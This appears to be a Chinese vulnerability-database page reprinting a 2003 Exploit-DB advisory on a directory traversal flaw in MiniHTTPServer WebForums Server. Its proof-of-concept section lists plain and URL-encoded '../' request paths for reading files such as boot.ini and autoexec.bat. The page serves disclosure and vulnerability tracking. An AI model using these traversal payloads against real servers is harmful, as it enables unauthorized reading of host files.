MiniHTTPServer Web Forums Server 1.x/2.0 – Directory Traversal

MiniHTTPServer Web Forums Server 1.x/2.0 – Directory Traversal

漏洞ID 1053977 漏洞类型
发布时间 2003-06-18 更新时间 2003-06-18
图片[1]-MiniHTTPServer Web Forums Server 1.x/2.0 – Directory Traversal-安全小百科CVE编号 N/A
图片[2]-MiniHTTPServer Web Forums Server 1.x/2.0 – Directory Traversal-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22795
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7955/info

It has been reported that WebForums Server does not properly handle some types of requests. Because of this, attackers may be able to gain access to files on the host server with the privileges of the web server process.

http://www.example.com/../../../../autoexec.bat
http://www.example.com/../../../autoexec.bat
http://www.example.com/../../boot.ini
http://www.example.com/../../boot.ini
http://www.example.com/../../../boot.ini
http://www.example.com/../../../boot.ini

Additional directory traversal proof of concepts had been provided by R00tCr4ck <root cyberspy org>:

http://www.example.com/......file.ext
http://www.example.com/../../../file.ext
or as encoded format:
http://www.example.com/%2E%2E%5C%2E%2E%5C%2E%2E%5Cfile.ext
http://www.example.com/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext

相关推荐: ircII Status_Make_Printable Memory Corruption Vulnerability

ircII Status_Make_Printable Memory Corruption Vulnerability 漏洞ID 1100665 漏洞类型 Boundary Condition Error 发布时间 2003-03-14 更新时间 2003-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享